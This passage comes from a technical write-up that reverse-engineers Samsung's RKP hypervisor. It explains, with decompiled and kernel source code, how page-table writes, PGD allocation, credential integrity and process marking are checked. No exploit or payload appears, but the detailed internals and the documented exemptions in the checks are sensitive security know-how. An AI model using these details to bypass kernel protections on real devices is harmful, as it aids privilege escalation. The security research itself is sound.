      return rkp_phys_map_unlock(pudp_pa);
    }
    // Otherwise, trigger a policy violation.
    rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
  }
  // Check if this is a kernel or user PUD using the physmap.
  is_kernel = is_phys_map_kernel(pudp_pa);
  // The old descriptor was valid.
  if (pud_old) {
    // The old descriptor was not a table, thus was a block.
    if ((pud_old & 0b11) != 0b11) {
      // Unmapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
    }
    // The old descriptor was a table, call `rkp_l2pgt_process_table` to process the old PMD.
    res = rkp_l2pgt_process_table(pud_old & 0xfffffffff000, (pudp_pa << 27) & 0x7fc0000000, 0 /* free */);
  }
  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // The new descriptor is valid.
  if (pud_new) {
    // Get the VA mapped by the PUD descriptor.
    addr = start_addr | (pudp_pa << 27) & 0x7fc0000000;
    // The new descriptor is not a table, thus is a block.
    if ((pud_new & 0b11) != 0b11) {
      // Mapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
    }
    // The new descriptor is a table, call `rkp_l2pgt_process_table` to process the new PMD.
    res = rkp_l2pgt_process_table(pud_new & 0xfffffffff000, addr, 1 /* alloc */);
    // For user PUD, set the PXN bit of the PUD descriptor.
    if (!is_kernel) {
      set_pxn_bit_of_desc(&pud_new, 1);
    }
    // ...
  }
  if (res) {
    uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
    return rkp_phys_map_unlock(pudp_pa);
  }
  // Finally, perform the write of the PUD descriptor on behalf of the kernel.
  set_entry_of_pgt(pudp_pa, pud_new);
  return rkp_phys_map_unlock(pudp_pa);
}

Second Level

rkp_l2pgt_write handles writes to second level tables (or PMDs). It first ensures the PMD is marked as L2 in the physmap. It then processes the old and new descriptor values using the check_single_l2e function. If the old or the new descriptor maps protected memory, the write is disallowed. Finally, if both checks pass, the new descriptor value is written.

uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
  // ...

  // Convert the PMD descriptor PA into a VA.
  pmdp_pa = rkp_get_pa(pmdp);
  // Get the old/current value of the PMD descriptor.
  pmd_old = *pmdp_pa;
  rkp_phys_map_lock(pmdp_pa);
  // Ensure the PMD is marked as such in the physmap.
  if (!is_phys_map_l2(pmdp_pa)) {
    // If RKP is deferred initialized, continue with the processing.
    if (rkp_deferred_inited) {
      uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
    }
    // Otherwise, perform the write.
    else {
      set_entry_of_pgt(pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  is_flag3 = is_phys_map_flag3(pmdp_pa);
  // Check if this is a kernel or user PMD using the physmap.
  is_kernel = is_phys_map_kernel(pmdp_pa);
  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // Get the VA mapped by the PMD descriptor.
  addr = (pmdp_pa << 18) & 0x3fe00000 | ((is_flag3 & 0x1ff) << 30) | start_addr;
  // If the old descriptor was valid.
  if (pmd_old) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(pmdp_pa, addr, 0 /* free */);
    // If the old descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  // If the new descriptor is valid.
  if (pmd_new) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(&pmd_new, addr, 1 /* alloc */);
    // If the new descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
    // ...
  }
  // Finally, perform the write of the PMD descriptor on behalf of the kernel.
  set_entry_of_pgt(pmdp_pa, pmd_new);
  return rkp_phys_map_unlock(pmdp_pa);
}

Third Level

rkp_l3pgt_write handles writes to third level tables (or PTs). There is a special case if the descriptor maps virtual memory right before the kernel text section, in which case its PXN bit is set and the write is performed. Otherwise, the write is allowed if the PT is mapped as L3 or as FREE in the physmap and either the new descriptor is not a page descriptor, or its PXN bit is set, or RKP is not deferred initialized.

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...

  // Convert the PT descriptor PA into a VA.
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  // If the PT is marked as such in the physmap, or as `FREE`.
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    // If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
    if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    }
    // Otherwise, the check fails if RKP is deferred initialized.
    else {
      allowed = rkp_deferred_inited == 0;
    }
  }
  // If the PT is marked as something else, the check also fails.
  else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  cs_enter(&l3pgt_lock);
  // In the special case where the descriptor is in the same page as the descriptor that maps the start of the kernel
  // text section and maps memory that is before the start of the kernel text section.
  if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xfff) {
    // Set the PXN bit of the new descriptor value.
    if (pte_val) {
      pte_val |= (1 << 53);
    }
    cs_exit(&l3pgt_lock);
    // And perform the write on behalf of the kernel.
    return set_entry_of_pgt(ptep_pa, pte_val);
  }
  cs_exit(&l3pgt_lock);
  // If the check failed, trigger a policy violation.
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  // Otherwise, perform the write of the PT descriptor on behalf of the kernel.
  return set_entry_of_pgt(ptep_pa, pte_val);
}

Allocating and Freeing PGDs

In addition to modifying the descriptors contained in the PUDs, PMDs, and PTs, the kernel also needs to allocate, and sometimes free, PGDs.

On the kernel side, the allocation of a PGD is done by the pgd_alloc function. It calls rkp_ro_alloc to get a read-only page from the hypervisor and then invokes the RKP_NEW_PGD command to notify RKP that this page will be a PGD.

pgd_t *pgd_alloc(struct mm_struct *mm)
{
    // ...
    pgd_t *ret = NULL;

    ret = (pgd_t *) rkp_ro_alloc();

    if (!ret) {
        if (PGD_SIZE == PAGE_SIZE)
            ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
        else
            ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
    }

    if(unlikely(!ret)) {
        pr_warn("%s: pgd alloc is failed\n", __func__);
        return ret;
    }

    uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);

    return ret;
    // ...
}

The freeing of a PGD is done by the pgd_free function. It invokes the RKP_FREE_PGD command to notify RKP that this page will no longer be a PGD and then calls rkp_ro_free to relinquish the page to the hypervisor.

void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
    // ...
    uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);

    /* if pgd memory come from read only buffer, the put it back */
    /*TODO: use a macro*/
    if (is_rkp_ro_page((u64)pgd))
        rkp_ro_free((void *)pgd);
    else {
        if (PGD_SIZE == PAGE_SIZE)
            free_page((unsigned long)pgd);
        else
            kmem_cache_free(pgd_cache, pgd);
    }
    // ...
}

On the hypervisor side, the rkp_cmd_new_pgd function ends up calling rkp_l1pgt_new_pgd after incrementing a counter. This function disallows allocating swapper_pg_dir, idmap_pg_dir, or tramp_pg_dir. If RKP is initialized, it calls rkp_l1pgt_process_table to process the new PGD (that is assumed to be a user PGD).

void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
  // ...

  // Convert the PGD VA into a PA.
  pgdp = rkp_get_pa(regs->x2) & 0xfffffffffffff000;
  // The allocated PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || TRAMP_PGD && pgdp == TRAMP_PGD) {
    rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
  }
  // If RKP is initialized, process the new PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 1 /* alloc */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}

The rkp_cmd_free_pgd function ends up calling rkp_l1pgt_free_pgd after incrementing a counter. This function disallows freeing swapper_pg_dir, idmap_pg_dir, or tramp_pg_dir. If RKP is initialized, it calls rkp_l1pgt_process_table to process the old PGD, unless it is the currently active user or kernel PGD, in which case an error is raised and the hypervisor panics.

void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
  // ...

  // Convert the PGD VA into a PA.
  pgd_pa = rkp_get_pa(regs->x2);
  pgdp = pgd_pa & 0xfffffffffffff000;
  // The freed PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
    uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
           ID_MAP_PGD);
    rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
  }
  // If RKP is initialized, process the old PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    // Unless this is the active user or kernel PGD (retrieved by checking the system register TTBRn_EL1 value).
    if ((get_ttbr0_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000) ||
        (get_ttbr1_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000)) {
      uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
             get_ttbr0_el1(), get_ttbr1_el1());
    }
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 0 /* free */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}

Credentials Protection

Kernel Structures

In the Protecting Kernel Data section, we have seen that the cred and task_security_struct structures are now allocated on read-only pages provided by the hypervisor. Thus, they can no longer be modified directly by the kernel. In addition, new fields are added to these structures for Data Flow Integrity (DFI) purposes. In particular, each structure now gets a "back-pointer", i.e. a pointer to the owning structure:

  • the task_struct for the cred structure;
  • the cred for the task_security_struct structure.

The cred structure also gets a back-pointer to the owning task's PGD, as well as a "use counter" that prevents reusing the cred structure of another task_struct (in particular, one might try to reuse the init task credentials).

struct cred {
    // ...
    atomic_t *use_cnt;
    struct task_struct *bp_task;
    void *bp_pgd;
    unsigned long long type;
} __randomize_layout;
struct task_security_struct {
    // ...
    void *bp_cred;
};

These back-pointers and values are verified when a SELinux hook is executed via a call to security_integrity_current. On our research device, the call to this function is missing, so in this section we will take a look at the source code of a different Samsung device that has it.

The kernel macros call_void_hook and call_int_hook contain the calls to security_integrity_current.

#define call_void_hook(FUNC, ...)               \
    do {                            \
        struct security_hook_list *P;           \
                                \
        if(security_integrity_current()) break; \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) \
            P->hook.FUNC(__VA_ARGS__);      \
    } while (0)

#define call_int_hook(FUNC, IRC, ...) ({            \
    int RC = IRC;                       \
    do {                            \
        struct security_hook_list *P;           \
                                \
        RC = security_integrity_current();      \
        if (RC != 0)                            \
            break;                              \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
            RC = P->hook.FUNC(__VA_ARGS__);     \
            if (RC != 0)                \
                break;              \
        }                       \
    } while (0);                        \
    RC;                         \
})

security_integrity_current first calls rkp_is_valid_cred_sp to verify that the credentials and security structures are allocated from a hypervisor-protected page. It then calls cmp_sec_integrity to verify the credentials' integrity, and cmp_ns_integrity to verify the mount namespace's integrity.

int security_integrity_current(void)
{
    rcu_read_lock();
    if ( rkp_cred_enable && 
        (rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
        cmp_sec_integrity(current_cred(),current->mm)||
        cmp_ns_integrity())) {
        rkp_print_debug();
        rcu_read_unlock();
        panic("RKP CRED PROTECTION VIOLATION\n");
    }
    rcu_read_unlock();
    return 0;
}

rkp_is_valid_cred_sp ensures that the credentials and security structures are protected by the hypervisor. init_cred and init_sec form a valid pair. For other pairs, the start and end of the structures must be located in a read-only page that has been allocated by the hypervisor. In addition, the back-pointer of the task_security_struct must be the correct cred structure.

extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
        struct task_security_struct *tsec = (struct task_security_struct *)sp;

        if((cred == (u64)&init_cred) && 
            ( sp == (u64)&init_sec)){
            return 0;
        }
        if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
            (!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
            return 1;
        }
        if((u64)tsec->bp_cred != cred) {
            return 1;
        }
        return 0;
}

cmp_sec_integrity checks that the back-pointer of the cred is the current task_struct, and that both the PGD pointer of the cred and the current memory descriptor point to the same PGD that must not be swapper_pg_dir.

static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
    return ((cred->bp_task != current) || 
            (mm && (!( in_interrupt() || in_softirq())) && 
            (cred->bp_pgd != swapper_pg_dir) &&
            (mm->pgd != cred->bp_pgd)));    
}

Protection Initialization

In order to be able to modify the cred structure of processes on behalf of the kernel and to perform verifications on the values of its fields, the hypervisor needs to be aware of its layout and of the layout of the task_struct structure.

On the kernel side, the function that does that is kdp_init. It invokes the RKP_KDP_X40 command with the offsets needed by RKP and, in addition, the virtual addresses of the verifiedbootstate and ss_initialized global variables.

void kdp_init(void)
{
    kdp_init_t cred;

    cred.credSize   = sizeof(struct cred);
    cred.sp_size    = rkp_get_task_sec_size();
    cred.pgd_mm     = offsetof(struct mm_struct,pgd);
    cred.uid_cred   = offsetof(struct cred,uid);
    cred.euid_cred  = offsetof(struct cred,euid);
    cred.gid_cred   = offsetof(struct cred,gid);
    cred.egid_cred  = offsetof(struct cred,egid);

    cred.bp_pgd_cred    = offsetof(struct cred,bp_pgd);
    cred.bp_task_cred   = offsetof(struct cred,bp_task);
    cred.type_cred      = offsetof(struct cred,type);
    cred.security_cred  = offsetof(struct cred,security);
    cred.usage_cred     = offsetof(struct cred,use_cnt);

    cred.cred_task      = offsetof(struct task_struct,cred);
    cred.mm_task        = offsetof(struct task_struct,mm);
    cred.pid_task       = offsetof(struct task_struct,pid);
    cred.rp_task        = offsetof(struct task_struct,real_parent);
    cred.comm_task      = offsetof(struct task_struct,comm);

    cred.bp_cred_secptr     = rkp_get_offset_bp_cred();

    cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
    cred.selinux.ss_initialized_va  = (u64)&ss_initialized;
#endif
    uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}

The first function called by kdp_init, rkp_get_task_sec_size, simply returns the size of the task_security_struct structure.

unsigned int rkp_get_task_sec_size(void)
{
    return sizeof(struct task_security_struct);
}

And the second function, rkp_get_offset_bp_cred, returns the offset of its bp_cred (back-pointer to credentials) field.

unsigned int rkp_get_offset_bp_cred(void)
{
    return offsetof(struct task_security_struct,bp_cred);
}

The cred_init function is called from the start_kernel function.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    cred_init();
    // ...
}

On the hypervisor side, the command is handled by rkp_cmd_cred_init, which calls rkp_cred_init.

rkp_cred_init allocates the rkp_cred structure, extracts and sanity-checks the various offsets provided by the kernel, and stores them into this structure. It also stores if the device is unlocked and the physical address of the variable denoting whether SELinux is initialized.

void rkp_cred_init(saved_regs_t* regs) {
  // ...

  // Allocate the `rkp_cred` structure that will hold all the offsets.
  rkp_cred = malloc(0xf0, 0);
  // Convert the VA of the kernel argument structure to a PA.
  cred = rkp_get_pa(regs->x2);
  // Ensure we're not calling this function multiple times.
  if (cred_inited == 1) {
    uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
    return;
  }
  // Extract the various fields of the kernel-provided structure.
  cred_inited = 1;
  credSize = cred->credSize;
  sp_size = cred->sp_size;
  uid_cred = cred->uid_cred;
  euid_cred = cred->euid_cred;
  gid_cred = cred->gid_cred;
  egid_cred = cred->egid_cred;
  usage_cred = cred->usage_cred;
  bp_pgd_cred = cred->bp_pgd_cred;
  bp_task_cred = cred->bp_task_cred;
  type_cred = cred->type_cred;
  security_cred = cred->security_cred;
  bp_cred_secptr = cred->bp_cred_secptr;
  // Ensure the offsets within a structure are not bigger than the structure total size.
  if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
      usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
      security_cred > credSize || bp_cred_secptr > sp_size) {
    uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
    return;
  }
  // Store the various fields into the corresponding global variables.
  rkp_cred->CRED_SIZE = cred->credSize;
  rkp_cred->SP_SIZE = sp_size;
  rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
  rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
  rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
  rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
  rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
  rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
  rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
  rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
  rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
  rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
  rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
  rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
  rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
  rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
  rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
  rkp_cred->CRED_USE_CNT = usage_cred >> 3;
  rkp_cred->VERIFIED_BOOT_STATE = 0;
  // Convert the VB state VA to a PA, and store the device unlock state in a global variable.
  vbs_va = cred->verifiedbootstate;
  if (vbs_va) {
    vbs_pa = check_and_convert_kernel_input(vbs_va);
    if (vbs_pa != 0) {
      rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
    }
  }
  rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
  // For `ss_initialized`, convert the VA to a PA and store it into a global variable.
  rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
  uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}

PGD Change

When the kernel needs to set the PGD of a task_struct, it calls into the hypervisor, which also updates the the task cred structure's back-pointer.

On the kernel side, the change of a task PGD can happen in two places. The first one is exec_mmap, which invokes the RKP_KDP_X43 command.

static int exec_mmap(struct mm_struct *mm)
{
    // ...
    if(rkp_cred_enable){
    uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
    }
    // ...
}

The second one is the rkp_assign_pgd function, which invokes the same command.

void rkp_assign_pgd(struct task_struct *p)
{
    u64 pgd;
    pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);

    uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}

rkp_assign_pgd is called from copy_process, which is when a process is being copied.

static __latent_entropy struct task_struct *copy_process(
                    unsigned long clone_flags,
                    unsigned long stack_start,
                    unsigned long stack_size,
                    int __user *child_tidptr,
                    struct pid *pid,
                    int trace,
                    unsigned long tls,
                    int node)
{
  // ...
    if(rkp_cred_enable)
        rkp_assign_pgd(p);
  // ...
}

On the hypervisor side, the command is handled by rkp_cmd_pgd_assign, which simply calls rkp_pgd_assign.

rkp_pgd_assign calls rkp_phys_map_verify_cred to ensure the kernel-provided structure is a legitimate cred structure before writing the new value of the bp_pgd field of the cred structure.

void rkp_pgd_assign(saved_regs_t* regs) {
  // ...

  // Convert the VA of the cred structure into a PA.
  cred = rkp_get_pa(regs->x2);
  // The new PGD of the task is in register x3.
  pgd = regs->x3;
  // Verify that the credentials are valid and hypervisor-protected.
  if (rkp_phys_map_verify_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !!  %lx %lx %lx", cred, regs->x2, pgd);
    return;
  }
  // Update the pgd field of the cred structure if the check passed.
  *(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}

rkp_phys_map_verify_cred verifies that the pointer is aligned on the size of the cred structure and marked as CRED in the physmap.

int64_t rkp_phys_map_verify_cred(uint64_t cred) {
  // ...

  // The credentials pointer must not be NULL.
  if (!cred) {
    return 1;
  }
  // It must be aligned on its expected size.
  if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(cred);
  // It must be marked as `CRED` in the physmap.
  if (is_phys_map_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
    rkp_phys_map_unlock(cred);
    return 1;
  }
  rkp_phys_map_unlock(cred);
  return 0;
}

Security Change

Similarly to a change in the task PGD, the kernel also calls into the hypervisor to change the security field of a cred structure.

On the kernel side, this is the case when the cred structure is being freed by the selinux_cred_free function. It invokes the RKP_KDP_X45 command but also calls rkp_free_security to free the task_security_struct structure.

static void selinux_cred_free(struct cred *cred)
{
    // ...
    if (rkp_ro_page((unsigned long)cred)) {
        uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
    }
    // ...
    rkp_free_security((unsigned long)tsec);
    // ...
}

rkp_free_security first calls chk_invalid_kern_ptr to check if the pointer given as an argument is a valid kernel pointer. If then calls rkp_ro_page and rkp_from_tsec_jar to ensure it was allocated from the hypervisor-protected cache, before calling kmem_cache_free (or kfree if it wasn't).

void rkp_free_security(unsigned long tsec)
{
    if(!tsec || 
        chk_invalid_kern_ptr(tsec))
        return;

    if(rkp_ro_page(tsec) && 
        rkp_from_tsec_jar(tsec)){
        kmem_cache_free(tsec_jar,(void *)tsec);
    }
    else { 
        kfree((void *)tsec);
    }
}

chk_invalid_kern_ptr checks if the pointer starts with 0xffffffc.

int chk_invalid_kern_ptr(u64 tsec) 
{
    return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}

rkp_ro_page calls rkp_is_pg_protected, unless the address to check is init_cred or init_sec.

static inline u8 rkp_ro_page(unsigned long addr)
{
    if(!rkp_cred_enable)
        return (u8)0;
    if((addr == ((unsigned long)&init_cred)) || 
        (addr == ((unsigned long)&init_sec)))
        return (u8)1;
    else
        return rkp_is_pg_protected(addr);
}

Finally, rkp_from_tsec_jar gets the head page from the object, then the slab cache, and returns if it is the tsec_jar cache.

int rkp_from_tsec_jar(unsigned long addr)
{
    static void *objp;
    static struct kmem_cache *s;
    static struct page *page;

    objp = (void *)addr;

    if(!objp)
        return 0;

    page = virt_to_head_page(objp);
    s = page->slab_cache;
    if(s && s->name) {
        if(!strcmp(s->name,"tsec_jar")) {
            return 1;
        }
    }
    return 0;
}

On the hypervisor side, the command is handled by rkp_cmd_cred_set_security, which calls rkp_cred_set_security.

rkp_cred_set_security gets the cred structure from the pointer to its security field that was given as an argument. It ensures it is marked as CRED in the physmap before setting the security field to a poison value.

int64_t* rkp_cred_set_security(saved_regs_t* regs) {
  // ...

  // Get the beginning of the cred structure from the pointer to its security field, and convert the VA into a PA.
  cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Ensure the cred structure is marked as `CRED` in the physmap.
  if (is_phys_map_cred(cred)) {
    return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
                  regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
  }
  // Convert the VA of the security field to a PA.
  security = rkp_get_pa(regs->x2);
  // Set the security field to the poison value 7 (remember that we are freeing the cred structure).
  *security = 7;
  return security;
}

Process Marking

Before delving into the credentials change, we must first explain the hypervisor's process marking.

On the kernel side, it happens in the handler of the execve system call. It will invoke the RKP_KDP_X4B command, giving it the path of the binary being executed, to detect any violations. In addition, if the current task is root, as checked with the CHECK_ROOT_UID macro, and the checking of restrictions on the binary being executed by the rkp_restrict_fork function fails, the system call returns immediately.

SYSCALL_DEFINE3(execve,
        const char __user *, filename,
        const char __user *const __user *, argv,
        const char __user *const __user *, envp)
{
    struct filename *path = getname(filename);
    int error = PTR_ERR(path);

    if(IS_ERR(path))
        return error;

    if(rkp_cred_enable){
        uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
    }

    if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
        if(rkp_restrict_fork(path)){
            pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
                            "PPID = %d(%s)\n",
            current->pid, current->comm,
            current->parent->pid, current->parent->comm);
            putname(path);
            return -EACCES;
        }
    }
    putname(path);
  return do_execve(getname(filename), argv, envp);
}

The CHECK_ROOT_UID macro returns if any of the UID, GID, EUID, EGID, SUID, or SGID is zero.

#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
            x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
            x->cred->suid.val == 0 || x->cred->sgid.val == 0)

The rkp_restrict_fork function ignores the /system/bin/patchoat and /system/bin/idmap2 binaries. It also ignores processes marked as "Linux on Dex", as checked by the rkp_is_lod macro. For processes marked as "non root", checked by the rkp_is_nonroot macro, the credentials are changed to the shell user credentials (that is, UID and GID 2000).

static int rkp_restrict_fork(struct filename *path)
{
    struct cred *shellcred;

    if (!strcmp(path->name, "/system/bin/patchoat") ||
        !strcmp(path->name, "/system/bin/idmap2")) {
        return 0;
    }
        /* If the Process is from Linux on Dex, 
        then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
    if(rkp_is_lod(current)){
            return 0;
        }
#endif
    if(rkp_is_nonroot(current)){
        shellcred = prepare_creds();
        if (!shellcred) {
            return 1;
        }
        shellcred->uid.val = 2000;
        shellcred->gid.val = 2000;
        shellcred->euid.val = 2000;
        shellcred->egid.val = 2000;

        commit_creds(shellcred);
    }
    return 0;
}

The rkp_is_nonroot macro checks if bit 1 of the type field of the cred structure is set.

#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)

The rkp_is_lod macro checks if bit 3 of the type field of the cred structure is set.

#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)

Now we will take a look at the hypervisor side of the process marking to see when these two bits are set.

On the hypervisor side, the command in execve is handled by rkp_cmd_mark_ppt, which calls rkp_mark_ppt.

rkp_mark_ppt does some sanity checking on the current task_struct and its cred structure, and then changes the bits of the type field:

  • it sets CRED_FLAG_MARK_PPT (bit 2) for adbd, app_process32 and app_process64;
  • it sets CRED_FLAG_LOD (bit 3) for nst;
  • it unsets CRED_FLAG_CHILD_PPT (bit 1) for idmap2 and patchoat.
void rkp_mark_ppt(saved_regs_t* regs) {
  // ...

  // Get the current task_struct in the kernel.
  current_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  current_pa = rkp_get_pa(current_va);
  // Get the current cred structure from the current task_struct.
  current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
  // Get the binary path given as argument in register x2.
  name_va = regs->x2;
  // Convert the binary path VA into a PA.
  name_pa = rkp_get_pa(name_va);
  // Sanity-check: the values must be non NULL and the current cred must be marked as `CRED` in the physmap.
  if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
    uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
  }
  // adbd, app_process32 and app_process64 are marked as `CRED_FLAG_MARK_PPT` (4).
  if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
      !strcmp(name_pa, "/system/bin/app_process64")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
  }
  // nst is marked as `CRED_FLAG_LOD` (8, checked by `rkp_is_lod`).
  if (!strcmp(name_pa, "/system/bin/nst")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
  }
  // idmap2 is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
  if (!strcmp(name_pa, "/system/bin/idmap2")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
  // patchoat is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
